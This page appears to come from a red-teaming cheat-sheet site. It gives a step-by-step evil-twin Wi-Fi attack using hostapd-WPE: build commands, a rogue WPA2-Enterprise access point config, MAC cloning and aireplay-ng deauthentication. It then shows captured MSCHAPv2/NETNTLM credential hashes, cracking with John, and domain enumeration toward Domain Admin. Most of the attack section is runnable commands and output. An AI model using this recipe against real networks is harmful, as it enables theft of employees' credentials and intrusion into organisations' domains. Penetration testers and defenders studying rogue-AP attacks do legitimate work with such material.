Red Teaming and Malware Analysis
  • About
  • Red Teaming
  • Cheat Sheet
    • Web
      • Misc
      • File Upload bypass
      • Authentication bypass
      • SQL Injection
      • XSS
      • XXE
      • Reverse-shell
      • Webshell
      • (De)Serialization
    • Active Directory
    • Services by port
      • Enum
      • 5060 - SIP
      • 25 - SMTP
      • 135 - RPC
      • 445 - SMB
      • 11211 - PHPMemCached
      • ldap
    • Hardening
    • Stuff
      • Basic tips/scripts
      • OpenBSD & NetBSD
      • File Transfer
      • Pivoting
  • Active Directory 101
    • Dumping Active Directory DNS using adidnsdump
    • PrintNightmare
    • From DFSCoercer to DA
  • Fuzzing and Web
    • Server Side Template Injection (SSTI)
    • Finding SSRF (all scope)
    • Format String Exploitation
    • Cache Poisoning using Nuclei
  • Initial Foothold
    • Browser In The Browser (BITB) Attack
    • Phishing with Office
      • Weaponizing XLM 4.0 macros
  • Privilege Escalation (Privesc)
    • AV/EDR Bypass
      • Bypass AV/EDR using Safe Mode
      • Resources
    • UAC bypass
    • Process migration like meterpreter
  • Lateral Movement (Pivoting)
    • From Windows VPN + Kali VPN + DC
      • By using Proxifier
  • Persistence
  • Command and Control (C&C)
    • CobaltStrike 101
      • Pivoting DMZ: weevely + ngrok + CS Pivot COMBO via Linux
      • Extras + Plugins
      • Resources
  • Data Exfiltration
    • Extracting certs/private keys from Windows using mimikatz and intercepting calls with burpsuite
  • CVE & Exploits / CTF
    • Privilege Escalation
    • Serialization
    • CVEs
      • CHIYU IoT devices
      • Chamilo-lms-1.11.x - From XSS to account takeover && backdoor implantation
    • CVE - Submission Guides
  • Tools
    • Intel
    • OSINT
    • DNS
    • WEB
      • API and WS Hacking
      • Web Discovery
      • Web Fuzzing
      • Path Traversal
      • GraphQL
      • JWT
    • Infrastructure and Network
      • Scan and Discovery
        • Network mapper
      • Automated Scanners
      • Misc
      • Active Directory
        • Burpsuite with Kerberos Auth
      • Cloud & Azure
      • Command and Control (C&C)
      • (De)serialization
      • Lateral Movement
      • Powershell
    • Privilege Escalation
    • Exfiltration
    • Persistence
    • Password & Cracking
      • Wordlists
      • Tips
      • Rainbow Crackalack
    • Static Code Analysis
    • Reporting
  • Resources
  • Pwnage
    • WiFi
      • HOSTAPD-WPE
      • Rogue APP
      • WPA3 Downgrade attack
    • NRF
    • rubber ducky
  • Malware Analysis
  • Unpacking
  • Basic tips
  • Malware instrumentation with frida
  • Tools
    • Debuggers / Disassemblers
    • Decompilers
    • Detection and Classification
    • Deobfuscation
    • Debugging and Reverse Engineering
    • Memory
    • File Analysis
    • Emulators
    • Network Traffic Analysis
    • Other
    • Online Tools
  • Resources
    • DFIR FTK Imager
    • Convert IP Range into CIDR
    • Parsing Large Raw Files and Excluding Country IP Address Ranges
    • Windows Logs Automation
      • amcache.hve
    • Windows EventViewer Analysis | DFIR
    • Prevent Windows shutdown after license expire
    • Firewall raw Logs
  • Mobile
    • Tools
    • Reverse iOS ipa
      • Jailbreak
      • Install Frida iPhone 5S
      • Frida instrumentation
      • Resources / Extra features
    • Reverse Android APKs
      • Android Dynamic Analysis
      • Bypass root + Frida
      • SSL unpining frida + Fiddler/Burp
      • Backdooring/patch APKs
    • Basic tips
    • Resources
  • IoT / Reverse / Firmware
    • Basic tips
      • Repair NTFS dirty disks
    • Reverse IoT devices
      • Reverse TP-Link Router TL-WR841N
      • Reverse Trendnet TS-S402 firmware
      • Full emulate Netgear WNAP320
      • Reverse ASUS RT-AC5300
      • Reverse LinkOne devices
    • Tools
      • Qemu + buildroot 101
      • Kernel
    • Resources
Powered by GitBook
On this page
  • Getting Domain Admin From WiFI Scratch Approach \o/
  • Reference

Was this helpful?

  1. Pwnage
  2. WiFi

HOSTAPD-WPE

PreviousWiFiNextRogue APP

Last updated 1 year ago

Was this helpful?

apt-get install libssl-dev libnl-genl-3-dev libnl-3-dev pkg-config libsqlite3-dev build-essential wget --no-install-recommends

Download the files:

wget https://raw.githubusercontent.com/aircrack-ng/aircrack-ng/master/patches/wpe/hostapd-wpe/hostapd-2.10-wpe.patch
wget https://w1.fi/releases/hostapd-2.10.tar.gz
tar -zxf hostapd-2.10.tar.gz
cd hostapd-2.10
patch -p1 < ../hostapd-2.10-wpe.patch
cd hostapd
make
make install
make wpe

Creating certs

cd /etc/hostapd-wpe/certs
./bootstrap
make install

vim wpeattackap.conf

└─$ cat wpe_custom.conf 
# ------------------------------
# common hostapd configuration
# ------------------------------
interface=wlan0mon
ssid=XX-AP  #name of the app (even it is hidden)
channel=4
hw_mode=g

# --------------------
# WPA configuration
# --------------------
wpa=2                                       # use WPA2 version
wpa_key_mgmt=WPA-EAP
wpa_pairwise=TKIP CCMP

# --------------------------
# EAP server configuration
# --------------------------
ieee8021x=1                                 # requires 802.1x authentication server
eapol_key_index_workaround=0                # EAPOL key index fix for WinXP supplicant (disabled here)
eap_server=1                                # enable integrated EAP server instead of RADIUS
#eap_user_file=fakenet.eap_user              # filename containing information of users

# -------------------------------------------------
# certificate configuration for EAP-TLS/PEAP/TTLS
# -------------------------------------------------
#ca_cert=/root/certs/ca.pem
#server_cert=/root/certs/server.pem 
#private_key=/root/certs/server.key          # private key for the server certificate
#private_key_passwd=                         # password used to encrypt the private key (empty here)
#dh_file=/root/certs/dhparam.pem             # file path to DH/DSA parameters file (in PEM format)

eap_user_file=/etc/hostapd-wpe/hostapd-wpe.eap_user
ca_cert=/etc/hostapd-wpe/ca.pem
server_cert=/etc/hostapd-wpe/server.pem
private_key=/etc/hostapd-wpe/server.key
private_key_passwd=whatever
dh_file=/etc/hostapd-wpe/dh


# -----------------------------
# mana specific configuration
# -----------------------------
#mana_wpe=1                                  # enable WPE mode to intercept various EAP credentials
#mana_eapsuccess=1                           # return EAP success to the clients, and have them connect

Use the same MAC of target APP

macchanger --mac xx:Xx:xx:xx interface
sudo ./hostapd-wpe ~/wirelesspentestlabs/wpeattackap.conf
sudo airodump-ng --channel 4 wlp0s20f3 -w temp --essid-regex XX-AP

Deauth (with MAC clone, deauth is not necessary if signal is strong \m/)

sudo aireplay-ng --deauth 50 -a 6c:8d:77:27:a1:25  --ignore-negative-one wlp0s20f3

GOTCHA!

wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.1X: Identity received from STA: 'XXXX\xxx.xxx'


mschapv2: Fri Mar 15 03:36:34 2024
         username:      xxx\xxx.xx
         challenge:     57:f6xx:c6:33:4b
         response:      9e:2a:87xxxxx:ef:b2:58:4a:3f:b3:fd:1d:03:08
         jtr NETNTLM:           xx\xx.leao:$NETNTLM$57f6xc6334b$9exxxxxxx84a3fb3fd1d0308
         hashcat NETNTLM:       xx\xx.leao::::9e2a8702xxf6bbxxxx3fb3fd1d0308:57f6xxxc6334b
wlan0mon: STA 5c:fb:3a:2f:00:2f IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: authenticated
wlan0mon: STA b4:d5:bd:a0:92:27 IEEE 802.11: associated (aid 3)

Cracking it!

john-the-ripper hash 

Getting Domain Admin From WiFI Scratch Approach \o/

As the SSID is hidden, the "hidden" network can be created.

cat /etc/resolv.conf
nameserver 127.0.0.53
options edns0 trust-ad
search xxx.local

ptavares@kali:~$ host xxxx.local
xxx.local has address 10.1.11.36
xxxx.local has address 10.0.4.1
xxxx.local has address 10.1.0.1
Bloodhound, or other tools can be executed now \,)
crackmapexec smb DC01 -u -p --users

Reference

hostapd-wpe
Wireless pentest lab Part 3